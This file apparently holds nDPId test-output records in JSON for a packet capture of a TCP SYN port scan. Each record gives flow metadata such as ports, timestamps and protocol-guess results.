+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 